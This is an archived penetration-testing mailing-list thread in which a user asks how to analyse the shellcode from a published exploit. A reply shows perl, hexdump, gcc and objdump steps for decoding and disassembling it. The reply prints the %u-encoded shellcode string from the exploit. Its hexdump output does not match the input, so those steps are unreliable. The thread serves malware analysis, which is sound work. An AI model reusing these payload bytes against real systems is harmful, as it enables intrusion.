Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: Analyzing Shellcode
From: Joshua Gimer <jgimer () gmail com>
Date: Thu, 5 Nov 2009 16:12:10 -0700

Try the technique in this post:

http://isc.sans.org/diary.html?storyid=4972

Macintosh-5:/tmp joshuagimer$ cat >> shellcode.txt
%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580

Macintosh-5:/tmp joshuagimer$ cat shellcode.txt | perl -pe
's/%(..)(..)/chr(hex($2)).chr(hex($1))/ge' > shellcode
Macintosh-5:/tmp joshuagimer$ hexdump -Cv shellcode
00000000  92 00 62 fb 00 31 cb 00  64 53 00 36 b9 00 62 9c  |..b?.1?.dS.6?.b.|
00000010  00 35 47 00 34 af 00 34  a8 00 33 1f 00 63 b6 00  |.5G.4?.4?.3..c?.|
00000020  61 a0 00 33 40 00 37 73  00 30 cf 00 66 8b 00 62  |a?.3 ()  7s 0? f  b|
00000030  7f 00 66 4f 00 65 b7 00  34 d0 00 35 b8 00 62 28  |..fO.e?.4?.5?.b(|
00000040  00 64 89 00 33 cc 00 64  5a 00 32 7b 00 38 29 00  |.d..3?.dZ.2{.8).|
00000050  30 63 00 61 4e 00 39 aa  00 34 58 00 64 5a 00 33  |0c.aN.9?.4X.dZ.3|
00000060  f4 00 63 b4 00 36 b8 00  63 0a 00 64 84 00 34 24  |?.c?.6?.c..d..4$|
00000070  00 61 b8 00 31 80 00 64  74 00 38 bd 00 34 c4 00  |.a?.1..dt.8?.4?.|
00000080  36 39 00 32 34 00 61 04  00 66 86 00 65 c8 00 65  |69.24.a..f..e?.e|
00000090  20 00 37 6b 00 34 4d 00  34 08 00 34 cb 00 61 78  | .7k.4M.4..4?.ax|
000000a0  00 32 17 00 63 8c 00 30  a8 00 63 4a 00 36 72 00  |.2..c..0?.cJ.6r.|
000000b0  31 d2 00 65 0b 00 30 d2  00 63 0a 00 38 05 00 62  |1?.e..0?.c..8..b|
000000c0  3f 00 34 4e 00 38 a9 00  63 b8 00 35 dc 00 62 07  |?.4N.8?.c?.5?.b.|
000000d0  00 64 d9 00 32 9e 00 31  63 00 31 58 00 30 0a     |.d?.2..1c.1X.0.|
000000df
Macintosh-5:/tmp joshuagimer$ cat shellcode | perl -ne 's/(.)/printf
"0x%02x,",ord($1)/ge' > shellcode.c
Macintosh-5:/tmp joshuagimer$ vim shellcode.c
Macintosh-5:/tmp joshuagimer$ gcc -O0 -fno-inline shellcode.c -o shellcode2
Macintosh-5:/tmp joshuagimer$ objdump --disassembler-options=intel -D
shellcode2 | less

You will then see you shellcode under the following section:

08048484 <_IO_stdin_used>:

Josh

On Thu, Nov 5, 2009 at 10:38 AM, cAs <writemecas () googlemail com> wrote:
Good evening everybody,

i am trying to analyze the shellcode used in this exploit:
http://www.milw0rm.com/exploits/7477

If i echo the unescaped shellcode i only get wierd chinese (i think)
letters.

What's the right way to analyze what kind of shellcode is beeing used
and what command is beeing executed by it.

Greetings,
cAs


------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------





-- 
Thx
Joshua Gimer

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault